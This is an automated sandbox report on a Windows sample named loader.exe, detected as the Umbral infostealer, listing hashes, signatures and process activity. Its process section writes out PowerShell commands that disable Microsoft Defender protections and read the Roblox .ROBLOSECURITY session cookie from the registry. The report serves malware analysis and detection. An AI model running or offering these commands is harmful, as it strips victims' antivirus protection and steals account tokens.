Analysis
-
max time kernel
121s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
14-03-2024 21:08
Behavioral task
behavioral1
Sample
loader.exe
Resource
win7-20240221-en
General
-
Target
loader.exe
-
Size
231KB
-
MD5
c534087d8b0da713f69ff7674465bb17
-
SHA1
f2ecb66437aa0ec06cce908428b6b891aed74071
-
SHA256
9bfbe65dc852646119cde7e50ba948d7fae6d80f2bc6483273478f398a726f97
-
SHA512
f7165e561a0f76b524e3db552e09caf44f3ef5200934e5de45163df386a0d769674148e741107acf5b92aa4b9e34c54cc5582d955da3892dc5986aef51bf4815
-
SSDEEP
6144:xloZMArIkd8g+EtXHkv/iD434SD34QWRJ6KyvSgR1EPab8e1m0i:DoZHL+EP8oE34QWRJ63vSgR1E+m
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/1640-0-0x00000000009A0000-0x00000000009E0000-memory.dmp family_umbral behavioral1/memory/1640-2-0x000000001B180000-0x000000001B200000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts loader.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1604 powershell.exe 2700 powershell.exe 1160 powershell.exe 2840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1640 loader.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1640 wrote to memory of 1604 1640 loader.exe 29 PID 1640 wrote to memory of 1604 1640 loader.exe 29 PID 1640 wrote to memory of 1604 1640 loader.exe 29 PID 1640 wrote to memory of 2700 1640 loader.exe 31 PID 1640 wrote to memory of 2700 1640 loader.exe 31 PID 1640 wrote to memory of 2700 1640 loader.exe 31 PID 1640 wrote to memory of 1160 1640 loader.exe 33 PID 1640 wrote to memory of 1160 1640 loader.exe 33 PID 1640 wrote to memory of 1160 1640 loader.exe 33 PID 1640 wrote to memory of 2840 1640 loader.exe 35 PID 1640 wrote to memory of 2840 1640 loader.exe 35 PID 1640 wrote to memory of 2840 1640 loader.exe 35 PID 1640 wrote to memory of 1108 1640 loader.exe 37 PID 1640 wrote to memory of 1108 1640 loader.exe 37 PID 1640 wrote to memory of 1108 1640 loader.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1640 -s 18802⤵PID:1108
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ed43763bc9d1e273d942c28b4872c558
SHA18aa12f48474767a5c66296157c0711cd9b8ac8f8
SHA2561a762cf840ce618e4dd6b3c32892f0b7e21951b260f1eeca8234b6a89acd8c9b
SHA5125fd3bfb4fc7acf78976047e98867f87af5967cf20ee4bf6a6b5d9cd4f018c5e33c63a912633afa7ea7fcbaa99c5ec7997a3d1fc4717b657bf672d00682ef0969